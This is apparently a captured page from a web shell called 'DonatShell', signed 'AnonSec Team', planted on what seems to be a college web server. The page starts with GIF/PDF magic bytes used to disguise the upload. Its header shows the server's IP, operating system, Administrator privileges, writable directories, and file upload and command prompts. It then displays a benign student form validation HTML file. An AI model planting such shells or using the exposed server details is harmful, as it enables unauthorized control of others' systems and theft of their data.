GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/CST1022/Resources/Week/14/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/CST1022/Resources/Week/14/formValidation.html
<!DOCTYPE html>
<html lang="en">

<head>
  <title>Form validation</title>
  <meta charset="utf-8">
  <link href="formValidation.css" rel="stylesheet">
  <script src="formValidation.js"></script>
</head>

<body>

  <h1>Form validation</h1>

  <p id="para1">Before the script...</p>

  <div class="p">
    <form action="https://cst.ridgewater.edu/Tools/FormEcho/?Lab=CST1022%20Lab%208" name="ValidateForm" id="frmValidate" method="post">
      <label>First name:</label><input type="text" name="txtFirstname" id="txtFirstname" data-valid="1,24" value="">
      <br>
      <label>Last name:</label><input type="text" name="txtLastname" id="txtLastname" data-valid="1,64" value="">
      <br>
      <label>Address Line 2:</label><input type="text" name="txtAddress2" data-valid="0,24" id="txtAddress2" value="">
      <br>
      <label id="lblHobbies">Hobbies:</label>
      <br>
      <input type="checkbox" name="chkGard" id="chkGard" value="Gardening"><label for="chkGard">Gardening</label>
      <br>
      <input type="checkbox" name="chkRead" id="chkRead" value="Reading"><label for="chkRead">Reading</label>
      <br>
      <input type="text" name="txtOtherHobby" id="txtOtherHobby" value=""> <label>Other</label>
      <br>
      <input type="submit" name="btnSubmit" value="Submit">
     </form>
  </div>

  <script>
    "use strict";
    _Initialize();
  </script>

  <p id="para2">...After the script.</p>

</body>

</html>

Anon7 - 2022
AnonSec Team